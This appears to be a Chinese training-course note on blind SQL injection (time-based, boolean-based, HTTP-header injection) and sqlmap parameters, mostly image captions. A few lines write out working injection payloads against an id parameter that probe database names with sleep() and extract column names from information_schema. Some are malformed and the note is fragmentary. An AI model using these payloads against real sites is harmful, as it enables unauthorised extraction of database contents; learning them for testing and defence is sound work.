6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数

6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数_第1张图片
6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数_第2张图片
6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数_第3张图片

基于时间的盲注

表名的字典
6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数_第4张图片

1%27%20and%20if(ascii(substr(database(),1,1))>0,sleep(2),1)%20–+
?id=1’ and if(ascii(substr(database(),1,1))=0,sleep(2),1) --+
?id=1’ and if(left(database(),1)=‘s’,sleep(2),1) --+

基于布尔的盲注

6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数_第5张图片

?id=-1%27%20or%20left(database(),1)=%27u%27%20–+

?id=-1 or left(select column_name from information_schema.columns where table_name=‘users’ limit 5,1),8)=‘password’ --+

基于位置注入

http头注入

6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数_第6张图片

6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数_第7张图片
在这里插入图片描述

sqlmap参数

6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数_第8张图片
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

实操

爆数据库名字
报表名
报列名
报列的数据

你可能感兴趣的:(实训)